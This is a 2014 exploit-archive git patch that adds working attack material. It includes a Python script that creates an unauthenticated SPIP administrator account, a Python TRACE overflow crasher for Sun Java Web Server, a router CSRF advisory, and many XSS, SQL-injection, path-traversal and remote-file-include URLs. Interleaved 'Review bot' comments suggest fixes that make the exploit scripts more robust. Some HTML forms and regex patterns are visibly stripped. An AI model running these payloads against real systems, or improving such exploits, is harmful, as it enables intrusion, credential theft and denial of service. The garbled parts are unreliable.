From 3a4999409ac978e40a1ba2d858532ecd646c61f4 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 23 May 2014 04:36:15 +0000 Subject: [PATCH] Updated 05_23_2014 --- files.csv | 24 +++ platforms/hardware/remote/33471.txt | 9 + platforms/hardware/webapps/33455.txt | 104 ++++++++++++ platforms/multiple/dos/33472.py | 54 ++++++ platforms/php/webapps/33425.py | 70 ++++++++ platforms/php/webapps/33456.txt | 10 ++ platforms/php/webapps/33457.txt | 10 ++ platforms/php/webapps/33458.txt | 9 + platforms/php/webapps/33459.txt | 12 ++ platforms/php/webapps/33460.txt | 9 + platforms/php/webapps/33461.txt | 9 + platforms/php/webapps/33462.txt | 10 ++ platforms/php/webapps/33463.txt | 9 + platforms/php/webapps/33464.txt | 11 ++ platforms/php/webapps/33465.txt | 9 + platforms/php/webapps/33466.txt | 9 + platforms/php/webapps/33467.txt | 7 + platforms/php/webapps/33468.txt | 9 + platforms/php/webapps/33469.txt | 9 + platforms/php/webapps/33470.txt | 15 ++ platforms/php/webapps/33473.txt | 7 + platforms/php/webapps/33474.txt | 7 + platforms/php/webapps/33475.txt | 235 +++++++++++++++++++++++++++ platforms/windows/remote/33453.py | 90 ++++++++++ platforms/windows/remote/33454.py | 117 +++++++++++++ 25 files changed, 864 insertions(+) create mode 100755 platforms/hardware/remote/33471.txt create mode 100755 platforms/hardware/webapps/33455.txt create mode 100755 platforms/multiple/dos/33472.py create mode 100755 platforms/php/webapps/33425.py create mode 100755 platforms/php/webapps/33456.txt create mode 100755 platforms/php/webapps/33457.txt create mode 100755 platforms/php/webapps/33458.txt create mode 100755 platforms/php/webapps/33459.txt create mode 100755 platforms/php/webapps/33460.txt create mode 100755 platforms/php/webapps/33461.txt create mode 100755 platforms/php/webapps/33462.txt create mode 100755 platforms/php/webapps/33463.txt create mode 100755 platforms/php/webapps/33464.txt create mode 100755 platforms/php/webapps/33465.txt create mode 100755 platforms/php/webapps/33466.txt create mode 100755 platforms/php/webapps/33467.txt 
create mode 100755 platforms/php/webapps/33468.txt
create mode 100755 platforms/php/webapps/33469.txt
create mode 100755 platforms/php/webapps/33470.txt
create mode 100755 platforms/php/webapps/33473.txt
create mode 100755 platforms/php/webapps/33474.txt
create mode 100755 platforms/php/webapps/33475.txt
create mode 100755 platforms/windows/remote/33453.py
create mode 100755 platforms/windows/remote/33454.py
diff --git a/files.csv b/files.csv
index e121437e0..322710d99 100755
--- a/files.csv
+++ b/files.csv
@@ -30111,6 +30111,7 @@ id,file,description,date,author,platform,type,port
 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
 33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
 33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
+33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80
 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
 33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
 33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
@@ -30135,3 +30136,26 @@ id,file,description,date,author,platform,type,port 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 'recent.php' Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 33452,platforms/php/webapps/33452.txt,"Imagevue r16 'amount' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 +33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 +33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 +33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0 +33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 'SERVER' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 Cross Site Scripting and Remote File Include Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33458,platforms/php/webapps/33458.txt,"Discuz! 
1.0 'referer' Parameter Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 +33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 Cross Site Scripting And Directory Traversal Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 'search.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 'admin.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 'login.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0 +33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 'stop' Parameter Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 +33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 +33467,platforms/php/webapps/33467.txt,"WMNews 'admin/wmnews.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 +33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 +33469,platforms/php/webapps/33469.txt,"LXR 0.9.x Cross Referencer Multiple Cross Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 +33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 +33471,platforms/hardware/remote/33471.txt,"D-LINK DKVM-IP8 'auth.asp' Cross Site Scripting Vulnerability",2010-01-06,POPCORN,hardware,remote,0 +33472,platforms/multiple/dos/33472.py,"Sun Java 
System Web Server 6.1/7.0 HTTP 'TRACE' Heap Buffer Overflow Vulnerability",2010-01-06,"Evgeny Legerov",multiple,dos,0 +33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0 +33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0 +33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 diff --git a/platforms/hardware/remote/33471.txt b/platforms/hardware/remote/33471.txt new file mode 100755 index 000000000..c3dc72e30 --- /dev/null +++ b/platforms/hardware/remote/33471.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37646/info + +D-LINK DKVM-IP8 is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following example data is available: + +The POST variable nickname has been set to 1>">"> \ No newline at end of file diff --git a/platforms/hardware/webapps/33455.txt b/platforms/hardware/webapps/33455.txt new file mode 100755 index 000000000..ab28361c7 --- /dev/null +++ b/platforms/hardware/webapps/33455.txt 
@@ -0,0 +1,104 @@ +# Exploit Title: Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities +# Date: 05/20/2014 +# Author: Samandeep Singh - SaMaN( @samanL33T ) +# Vendor Homepage:http://www.binatonetelecom.in/4port-adsl2-wifi-router1.html +# Category: Hardware/Wireless Router +# Firmware Version: T6W-A1.005 and below +# Tested on: Binatone DT 850W Wireless Router +# Patch/ Fix: Vendor has not provided any fix for this yet +--------------------------------------------------- + +Disclosure Timeline +~~~~~~~~~~~~~~~~~~~ +04/23/2014 Contacted Vendor +04/26/2014 Vendor Replied +04/26/2014 Vulnerability Explained (No reply received) +05/04/2014 Vendor notified about full disclosure in 15 days (No reply) +05/20/2014 Full Disclosure + +Technical Details +~~~~~~~~~~~~~~~~~~ +Binatone DT 850W Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password, SSId of Wireless network,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link. + +Exploit Code +~~~~~~~~~~~~~ + +Change Wifi (WPA2/PSK) password & SSID by CSRF +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +Factory Reset Router Settings by CSRF +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ +
+ + + + +Change Router's Admin Password by CSRF +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ + +
+ + + + +Restart Router by CSRF +~~~~~~~~~~~~~~~~~~~~~~ + + + +
+ +
+ + + + +-- +SaMaN +twitter : @samanL33T \ No newline at end of file diff --git a/platforms/multiple/dos/33472.py b/platforms/multiple/dos/33472.py new file mode 100755 index 000000000..7be22e308 --- /dev/null +++ b/platforms/multiple/dos/33472.py @@ -0,0 +1,54 @@ +source: http://www.securityfocus.com/bid/37648/info + +Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability. + +Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks. + +The following are vulnerable: + +Sun Java System Web Server 7.0 prior to 7.0 Update 8 +Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12 +Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13 + +#!/usr/bin/env python +# sun_trace.py +# +# Use this code at your own risk. Never run it against a production system. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +import socket +import sys + +def send_req(host,port): + buf="TRACE /%s HTTP/1.0\n" % ("A"*4074) + for i in range(0,10): + buf += "%d"%i + ":\n" + + for i in range(ord('a'), ord('z')): + buf += chr(i) + ":\n" + + buf += "\n" + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((host,port)) + sock.sendall(buf) + resp="" + while 1: + s= sock.recv(4000) + if len(s)<1: break + resp+=s + print list(resp) + +if __name__=="__main__": + if len(sys.argv)<3: + print "usage: %s host port" % sys.argv[0] + sys.exit() + + send_req(sys.argv[1],int(sys.argv[2])) 
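Review bot: The advisory prose at the top of 33472.py (`source: http://www.securityfocus.com/bid/37648/info` through the three "prior to" version lines) is not commented out, so the file does not parse as Python as committed; 33425.py in this same commit keeps its header as `#` comments and this file should match. In send_req the socket is never closed: the receive loop exits on `len(s)<1` and the function falls off the end, so `sock.close()` belongs after the loop (or the socket should be wrapped in `contextlib.closing`). A one-line docstring on send_req, such as `"""Send one oversized TRACE request to host:port and print the raw response bytes."""`, would also tell a reader what `print list(resp)` is for.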
diff --git a/platforms/php/webapps/33425.py b/platforms/php/webapps/33425.py
new file mode 100755
index 000000000..e4c9ce073
--- /dev/null
+++ b/platforms/php/webapps/33425.py
@@ -0,0 +1,70 @@
+#!/usr/bin/env python
+# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
+# Date: 04/30/2014
+# Flaw finder : Unknown
+# Exploit Author: Gregory DRAPERI
+# Email: gregory |dot| draperi |at| gmail |dot| com
+# Google Dork : inurl="spip.php"
+# Vendor Homepage: www.spip.net
+# Software Link: http://files.spip.org/spip/archives/
+# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
+# Tested on: Windows 7 - SPIP 2.2.21
+# CVE : CVE-2013-2118
+'''
+---------------------------------------------------------------------------------------------------------
+Software Description:
+SPIP is a free software content management system
+---------------------------------------------------------------------------------------------------------
+Vulnerability Details:
+This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
+To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
+
+'''
+import urllib, urllib2
+import cookielib
+import sys
+import re
+
+def send_request(urlOpener, url, post_data=None):
+ request = urllib2.Request(url)
+ url = urlOpener.open(request, post_data)
+ return url.read()
+
+if len(sys.argv) < 4:
+ print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py "
+ exit()
+
+base_url = sys.argv[1]
+login = sys.argv[2]
+mail = sys.argv[3]
+
+cookiejar = cookielib.CookieJar()
+urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
+
+
+formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
+print "[+] First request sended..."
+
+
+m = re.search("]*", formulaire)
+m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
+
+
+formulaire_data = {'var_ajax' : 'form',
+ 'page' : 'identifiants',
+ 'mode' : '0minirezo',
+ 'formulaire_action' : 'inscription',
+ 'formulaire_action_args' : m.group(0),
+ 'nom_inscription' : login,
+ 'mail_inscription' : mail,
+ 'nobot' : ''
+ }
+formulaire_data = urllib.urlencode(formulaire_data)
+
+
+send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
+print "[+] Second request sended"
+
+
+print "[+] You should receive an email with credentials soon :) "
+
diff --git a/platforms/php/webapps/33456.txt b/platforms/php/webapps/33456.txt
new file mode 100755
index 000000000..65cb42290
--- /dev/null
+++ b/platforms/php/webapps/33456.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37558/info
+
+Stardevelop Live Help is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Live Help 2.6.0 is vulnerable; other versions (or products that include Live Help) may also be affected.
+
+http://www.example.com/livehelp/index_offline.php?SERVER=>">alert(213771818860)%3B
+http://www.example.com/livehelp/frames.php?SERVER=>">alert(213771818860)%3B&URL=www.example.org&SESSION=indoushka@example.org
diff --git a/platforms/php/webapps/33457.txt b/platforms/php/webapps/33457.txt
new file mode 100755
index 000000000..ac025a5c3
--- /dev/null
+++ b/platforms/php/webapps/33457.txt
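Review bot: Both `re.search` results in 33425.py are dereferenced with `m.group(0)` without checking for a failed match, so a response that lacks the expected form aborts with an AttributeError instead of a readable message; a guard such as `if m is None: sys.exit("[-] expected form field not found")` after each search would make that failure explicit. The first pattern renders here as `"]*"`, which looks like angle-bracket content lost in this view, so I cannot confirm the pattern itself. In the header, `Tested on: Windows 7 - SPIP 2.2.21` does not fall inside the affected range `< 3.0.9 / 2.1.22 / 2.0.23` and is probably a typo for 2.1.21. The usage string ends at `python script.py ` without naming the three positional arguments the script reads (`base_url`, `login`, `mail`), and `sended` in both status messages should read `sent`.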
@@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37559/info + +Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. The attacker may also execute script code in an unsuspecting user's browser or steal cookie-based authentication credentials. Other attacks are also possible. + +Photokorn 1.542 is vulnerable; other versions may also be affected. + +http://www.example.com/sm-p1542/install.php?lang=>">alert(213771818860)%3B +http://www.example.com/sm-p1542/index.php?lg=http://www.example.net/c.txt? diff --git a/platforms/php/webapps/33458.txt b/platforms/php/webapps/33458.txt new file mode 100755 index 000000000..fd3b5e5c4 --- /dev/null +++ b/platforms/php/webapps/33458.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37562/info + +Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Discuz! 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'>alert(213771818860)%3B \ No newline at end of file diff --git a/platforms/php/webapps/33459.txt b/platforms/php/webapps/33459.txt new file mode 100755 index 000000000..73c794277 --- /dev/null +++ b/platforms/php/webapps/33459.txt 
@@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37564/info + +DieselPay is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker could exploit these vulnerabilities to obtain sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. + +DieselPay 1.6 is vulnerable; other versions may also be affected. + +The following example URIs are available: + +http://www.example.com/dieselpay/index.php?read=alert(213771818860)%3B +http://www.example.com/dieselpay/index.php?read=../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/33460.txt b/platforms/php/webapps/33460.txt new file mode 100755 index 000000000..a0382674a --- /dev/null +++ b/platforms/php/webapps/33460.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37566/info + +Magic News Plus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Magic News Plus 1.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php/>[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33461.txt b/platforms/php/webapps/33461.txt new file mode 100755 index 000000000..c8895a92d --- /dev/null +++ b/platforms/php/webapps/33461.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37567/info + +PHPCart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +PHPCart 3.1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/search.php?action=submit&order_id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33462.txt b/platforms/php/webapps/33462.txt new file mode 100755 index 000000000..ec8f39f06 --- /dev/null +++ b/platforms/php/webapps/33462.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37568/info + + +VirtuaNews Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +VirtuaNews Pro 1.0.4 is vulnerable; other versions may also be affected. + +http://www.example.com/upload/admin.php?username=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33463.txt b/platforms/php/webapps/33463.txt new file mode 100755 index 000000000..f7bdbbd3f --- /dev/null +++ b/platforms/php/webapps/33463.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37569/info + +VisionGate is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +VisionGate 1.6 is vulnerable; other versions may also be affected. + +http://www.example.com/login.php?url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/33464.txt b/platforms/php/webapps/33464.txt new file mode 100755 index 000000000..d01ea4a69 --- /dev/null +++ b/platforms/php/webapps/33464.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37573/info + +Discuz! is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Discuz! 2.0 is vulnerable; other versions may also be affected. + + +http://www.example.com/Discuz/post.php?action=edit&fid=1&tid=17&pid=>">alert(213771818860)%3B&page=1 +http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>">alert(213771818860)%3B \ No newline at end of file diff --git a/platforms/php/webapps/33465.txt b/platforms/php/webapps/33465.txt new file mode 100755 index 000000000..310b4d6bb --- /dev/null +++ b/platforms/php/webapps/33465.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37574/info + +SLAED CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +SLAED CMS 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?name=Recommend&stop= \ No newline at end of file diff --git a/platforms/php/webapps/33466.txt b/platforms/php/webapps/33466.txt new file mode 100755 index 000000000..1cd4eae15 --- /dev/null +++ b/platforms/php/webapps/33466.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37593/info + +pL-PHP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +pL-PHP 0.9 beta is vulnerable; other versions may also be affected. + +http://www.example.com/files/index.php/>"> diff --git a/platforms/php/webapps/33467.txt b/platforms/php/webapps/33467.txt new file mode 100755 index 000000000..0bbe38da0 --- /dev/null +++ b/platforms/php/webapps/33467.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37600/info + +WMNews is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wmnews/admin/wmnews.php/>"> diff --git a/platforms/php/webapps/33468.txt b/platforms/php/webapps/33468.txt new file mode 100755 index 000000000..18f34f8f2 --- /dev/null +++ b/platforms/php/webapps/33468.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37605/info + +MercuryBoard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +MercuryBoard 1.1.5 is vulnerable; other versions may also be affected. + +http://www.example.com/mercuryboard-1.1.5/index.php/>'> \ No newline at end of file diff --git a/platforms/php/webapps/33469.txt b/platforms/php/webapps/33469.txt new file mode 100755 index 000000000..420dac196 --- /dev/null +++ b/platforms/php/webapps/33469.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37612/info + +LXR Cross Referencer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LXR Cross Referencer 0.9.5 and 0.9.6 are affected; other versions may also be vulnerable. + +http://www.example.com/lxr/ident?i= \ No newline at end of file diff --git a/platforms/php/webapps/33470.txt b/platforms/php/webapps/33470.txt new file mode 100755 index 000000000..d0108c534 --- /dev/null +++ b/platforms/php/webapps/33470.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/37613/info + +LineWeb is prone to multiple remote vulnerabilities: + +- Multiple local file-include vulnerabilities +- An SQL-injection vulnerability +- A security-bypass vulnerability + +An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +LineWeb 1.0.5 is vulnerable; other versions may also be affected. + +http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00 +http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00 +http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27 \ No newline at end of file diff --git a/platforms/php/webapps/33473.txt b/platforms/php/webapps/33473.txt new file mode 100755 index 000000000..ac28ad9e3 --- /dev/null +++ b/platforms/php/webapps/33473.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37654/info + +RoundCube Webmail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123 \ No newline at end of file diff --git a/platforms/php/webapps/33474.txt b/platforms/php/webapps/33474.txt new file mode 100755 index 000000000..6d5e97748 --- /dev/null +++ b/platforms/php/webapps/33474.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37655/info + +The DM Orders component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 \ No newline at end of file diff --git a/platforms/php/webapps/33475.txt b/platforms/php/webapps/33475.txt new file mode 100755 index 000000000..fd306d7d4 --- /dev/null +++ b/platforms/php/webapps/33475.txt 
@@ -0,0 +1,235 @@
+source: http://www.securityfocus.com/bid/37669/info
+
+dotProject is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+
+The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+dotProject 2.1.3 is vulnerable; other versions may also be affected.
+
+
+== Company ===
+The company creation screen fails to filter form details before creating
+a new company.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a new company
+2. Click the 'Companies' link in the top navigation bar
+3. Click the 'new company' button in the upper right
+4. Fill in "" for each field except for
+phone, phone2, and fax. These fields restrict the input size so simply
+put "" in these fields.
+5. Click the 'submit' button in the lower right hand corner
+6. On the resulting screen the company name XSS will appear.
+7. To view the other company XSS attacks browse to
+index.php?m=companies&a=view&company_id=X where 'X' is the id of the new
+company. Alternatively you can click on the 'Projects' link in the top
+navigation then the 'new project' button in the upper right. Create a
+new project, selecting the newly created company, which will appear as a
+blank choice in the company drop down list. Save the project and then
+in the project list click on the company name.
+
+Impact
+Any user with the permissions to create new companies can expose other
+users of dotProject to XSS attacks.
+
+== Project ===
+The project creation screen fails to filter form details before creating
+a new project.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a new project
+2. Click the 'Projects' link in the top navigation bar
+3. Click the 'new project' button in the upper right
+4. Fill in "" for the 'Project Name',
+'URL', 'Starting URL', and 'Description' fields
+5. Click the 'submit' button in the lower right hand corner
+6. On the resulting screen the project name XSS will appear.
+7. To view the other project XSS attacks browse to
+index.php?m=projects&a=view&project_id=X where 'X' is the id of the new
+project.
+
+Impact
+Any user with the permissions to create new projects can expose other
+users of dotProject to XSS attacks.
+
+== Task ===
+The task creation screen fails to filter form details before creating a
+new task.
+
+Proof of Concept
+1. Log into dotProject as a user with privileges to create a task
+2. Click the 'Projects' link in the top navigation bar
+3. Click on a project name to which the user account has permissions
+4. Click the 'new task' button in the upper right
+5. Fill in "" for the 'Task Name', 'Web
+Address', 'Description', and 'Description' fields
+6. Click on the 'Dates' tab and select an appropriate date
+7. Click the 'save' button in the lower right hand corner
+8. On the resulting screen the task name XSS will appear.
+9. To view the other task summary XSS attacks browse to
+index.php?m=tasks&a=view&task_id=X where 'X' is the id of the new task.
+
+Impact
+Any user with the permissions to create new tasks can expose other users
